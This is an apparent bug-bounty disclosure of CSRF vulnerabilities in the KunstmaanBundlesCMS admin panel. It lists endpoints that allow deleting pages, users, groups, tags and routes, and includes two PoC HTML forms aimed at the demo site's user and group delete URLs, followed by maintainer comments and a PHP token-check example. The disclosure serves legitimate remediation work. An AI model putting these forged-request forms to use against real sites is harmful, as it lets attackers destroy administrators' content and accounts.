Cross-Site Request Forgery (CSRF) in kunstmaan/kunstmaanbundlescms
Reported on
Oct 17th 2021
Description
There exist multiple high-impact CSRF vulnerabilities that let an attacker delete many parts of the application's content.
I provide the full list of CSRF-vulnerable endpoints for you.
(Because there are too many endpoints, I don't include the PoC.html for all of the vulnerable endpoints.)
Occurrences
PagePartAdmin.php L1-L387
delete any page
Tag.php L1-L21
delete any blog tag
Author.php L1-L19
delete any blog author
Bike.php L1-L171
Delete any Bike
RulesAdminListController.php L1-L84
delete any rule
User.php L1-L22
delete any user
//PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.bundles.kunstmaan.be/en/admin/settings/users/{id}/delete">
<input type="hidden" name="delete" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Replace {id} with the user id.
DuplicateSubPageInterface.php L1-L8
Duplicate any blog page
RedirectRouter.php L1-L219
delete any route
GroupsController.php L1-L168
delete any group
//PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.bundles.kunstmaan.be/en/admin/settings/groups/{id}/delete?delete=">
<input type="hidden" name="delete" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Replace {id} with the group id.
Category.php L1-L21
delete any blog category
These CSRFs can cause high-impact damage to the admin panel; please don't reduce the bounty amount.
Thanks so much.
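The server-side check that the PoC forms above get past, shown as an added example in plain PHP (not code from the report or from KunstmaanBundlesCMS): a delete is accepted only for a POST request carrying the session's token. The function names, the `_token` field and the `delete-user` intention are assumptions, and the requests are constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; not KunstmaanBundlesCMS code.

/** Issue a per-session token bound to one action ("intention"), e.g. "delete-user". */
function issueCsrfToken(array &$session, string $intention): string
{
    $session['csrf'][$intention] ??= bin2hex(random_bytes(32));
    return $session['csrf'][$intention];
}

/** Allow a delete only for POST requests that carry the session's token. */
function isDeleteAllowed(string $method, array $post, array $session, string $intention): bool
{
    if (strtoupper($method) !== 'POST') {
        return false; // a GET request must never change state
    }
    $expected = $session['csrf'][$intention] ?? null;
    $supplied = $post['_token'] ?? null;
    if (!is_string($expected) || !is_string($supplied)) {
        return false; // no token issued for this session, or none submitted
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed requests: the admin's own session plus four ways the delete can arrive.
$session = [];
$token = issueCsrfToken($session, 'delete-user');

$cases = [
    'cross-site GET form (shape of the PoC)' => ['GET', []],
    'cross-site POST without a token'        => ['POST', ['delete' => '']],
    'cross-site POST with a guessed token'   => ['POST', ['delete' => '', '_token' => str_repeat('0', 64)]],
    'same-site POST with the session token'  => ['POST', ['delete' => '', '_token' => $token]],
];

foreach ($cases as $label => [$method, $post]) {
    $verdict = isDeleteAllowed($method, $post, $session, 'delete-user') ? 'allowed' : 'rejected';
    printf("%-40s %s\n", $label, $verdict);
}
```

A cross-site page cannot read the token out of the admin's session, so only the form rendered by the application itself passes the check.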
Hi @amammad, thanks for the report!
@admin should I mark this issue as valid or not? The "base issue" was already reported in a separate vulnerability report and that one was marked as valid. The difference is that this report lists more locations where this security issue can be exploited.
If you believe the new occurrences, i.e. permalinks, point to unaddressed points of failure, feel free to mark this report as valid, yes.
Hey @maintainer
Just tell me to remove the repetitive endpoints.
@maintainer I carefully found all vulnerable endpoints to make you aware of all occurrences.
Please, if there isn't any problem, just validate my report too.
Best regards.